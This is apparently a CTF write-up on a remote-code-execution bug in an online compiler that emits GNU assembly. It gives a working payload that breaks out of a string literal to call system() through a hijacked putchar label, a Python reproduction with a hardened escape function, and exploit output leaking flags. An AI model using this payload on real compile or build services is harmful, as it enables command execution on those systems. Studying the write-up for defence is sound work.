The challenge features a custom language compiler/preprocessor that generates GNU ASM source, compiles it and executes the resulting binary.
The first bug we exploited was an RCE that leveraged unescaped strings in the generated assembly code.
SLOC source code that triggers the vulnerability:
CALL WRITECHAR "id\x00\"
CALL WRITECHAR ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"
([\r] should be replaced by the real \x0D characters; they serve as whitespace for GAS)
Generated assembly code:
.global main
.text
main:
push %rbp
mov %rsp, %rbp
sub $0, %rsp
leaq string0(%rip), %rdi
call putchar@PLT
leaq string1(%rip), %rdi
call putchar@PLT
xor %rax, %rax
mov %rbp, %rsp
pop %rbp
ret
string0:
.asciz "id\x00\"
string1:
.asciz ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"
Let's re-format the bottom part slightly (as GAS actually reads it) to make what happens more obvious:
string0:
.asciz "id\x00\"\nstring1:\n.asciz "
string1:
putchar:
call system@PLT
call exit@PLT
#"
The trailing \ injected into string0 escapes the closing quote, so GAS does not end the literal there: it only warns ("unterminated string; newline inserted") and keeps reading, swallowing the following lines up to the opening quote of string1's literal. Everything after that quote is parsed as assembly: ; separates statements, the \x0D bytes act as whitespace, and the trailing #" comments out the leftover quote. This defines a local putchar label, and the linker resolves main's call putchar@PLT to that local definition instead of the libc function. The first call therefore lands in our code with %rdi still pointing at string0 ("id"), which gets passed straight to system(), followed by exit().
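The generator and the break-out can be reproduced offline. The following is an added example, not the challenge's code or the original exploit: it re-creates the page's code generator (one WRITECHAR per string, each emitted as a .asciz literal), a small statement splitter that mimics how GAS reads the text (; and newline end statements outside a literal, a newline inside a literal only warns and is inserted, \ escapes the next character, # starts a comment), and a hardened escape function. The PAYLOAD constant is the SLOC payload from above transcribed with real carriage returns; names such as gen_program, gas_escape and hijacked_plt_calls are ours.

```python
import re

# Constructed payload, transcribed from the SLOC source in the writeup:
# string0 is the seven characters  i d \ x 0 0 \  (GAS later reads the "\x00"
# and the trailing backslash-quote); string1 carries real carriage returns (\r),
# which GAS treats as whitespace, so the injected code stays on one line.
PAYLOAD = [
    'id\\x00\\',
    ';string1:putchar:call\rsystem@PLT;call\rexit@PLT;#',
]


def gen_program(strings, escape):
    """Mimic the generator seen on the page: one WRITECHAR per string, each
    string emitted as a .asciz literal after passing through `escape`."""
    asm = ['.global main', '.text', 'main:',
           'push %rbp', 'mov %rsp, %rbp', 'sub $0, %rsp']
    for i in range(len(strings)):
        asm += [f'leaq string{i}(%rip), %rdi', 'call putchar@PLT']
    asm += ['xor %rax, %rax', 'mov %rbp, %rsp', 'pop %rbp', 'ret']
    for i, s in enumerate(strings):
        asm += [f'string{i}:', f'.asciz "{escape(s)}"']
    return '\n'.join(asm) + '\n'


def no_escape(s):
    """The vulnerable behaviour: copy the SLOC string verbatim."""
    return s


def gas_escape(s):
    """Hardened variant (our suggestion): escape backslash and double quote and
    emit every byte outside printable ASCII as an octal escape, so the literal
    always closes exactly where the generator closes it."""
    out = []
    for b in s.encode('utf-8'):
        if b == 0x5c:
            out.append('\\\\')
        elif b == 0x22:
            out.append('\\"')
        elif 0x20 <= b < 0x7f:
            out.append(chr(b))
        else:
            out.append('\\%03o' % b)
    return ''.join(out)


def gas_statements(asm):
    """Split text into statements roughly the way the GAS reader does."""
    stmts, cur = [], []
    in_str = in_comment = False
    i = 0
    while i < len(asm):
        c = asm[i]
        if in_comment:                       # '#' comment runs to end of line
            if c == '\n':
                in_comment = False
                stmts.append(''.join(cur)); cur = []
        elif in_str:                         # inside "...": newline does not end it
            cur.append(c)
            if c == '\\' and i + 1 < len(asm):
                cur.append(asm[i + 1]); i += 1   # backslash escapes next char
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True; cur.append(c)
        elif c == '#':
            in_comment = True
        elif c in ';\n':                     # statement separators
            stmts.append(''.join(cur)); cur = []
        else:
            cur.append(c)
        i += 1
    stmts.append(''.join(cur))
    return [s.strip() for s in stmts if s.strip()]


LABEL_RE = re.compile(r'^\s*([A-Za-z_.$][\w.$]*)\s*:')
CALL_PLT_RE = re.compile(r'^call ([\w.$]+)@PLT$')


def analyse(asm):
    """Return (labels defined, instructions), with whitespace inside each
    instruction (including the \\r bytes) normalised to single spaces."""
    labels, instrs = [], []
    for stmt in gas_statements(asm):
        while (m := LABEL_RE.match(stmt)):   # several labels may precede one instruction
            labels.append(m.group(1))
            stmt = stmt[m.end():]
        stmt = ' '.join(stmt.split())
        if stmt and not stmt.startswith('.'):
            instrs.append(stmt)
    return labels, instrs


def hijacked_plt_calls(asm):
    """Names called via @PLT that the program also defines as labels: the
    linker resolves those calls to the local definition instead of libc."""
    labels, instrs = analyse(asm)
    targets = {m.group(1) for m in map(CALL_PLT_RE.match, instrs) if m}
    return targets & set(labels)


if __name__ == '__main__':
    for name, esc in (('vulnerable', no_escape), ('hardened', gas_escape)):
        asm = gen_program(PAYLOAD, esc)
        labels, instrs = analyse(asm)
        print(f'== {name} ==\n{asm}')
        print('labels:', labels)
        print('hijacked PLT calls:', hijacked_plt_calls(asm) or 'none')
```

With no_escape the analysis reports the extra putchar label and the injected call system@PLT / call exit@PLT statements, exactly the reformatted listing above; with gas_escape both strings stay inside their own literals and nothing is hijacked. The splitter is only an approximation of the GAS reader, good enough to show where the literal ends and nothing more.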
The original PoC SLOC code and the exploit code are attached.
root@voshiba:~# ./splo.php 127.0.0.1
Welcome to SLOC - your Simple Language Online Compiler
What do you want to do?
1 <size>\n<code (size bytes) Compiles and runs your program
Prints the result and gives you an (id, pwd)
to get your out again later
2 <id> <pwd> Shows to result of the given run again
3 Lists all recent run ids
runs/bla:FAUST_blablablablaba
runs/test:FAUST_qweyqwieuywqiue
runs/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
runs/tmpxdkw8t_o3XO3TRUHN6CCAM2S:RX7QZWZIW66BDRNOruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiueruns/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
SUCC: Submission stored with id tmpcq_f5drkENYXKHEYE3AB6QW3 and pwd 3RUVNHAASYEWXGEA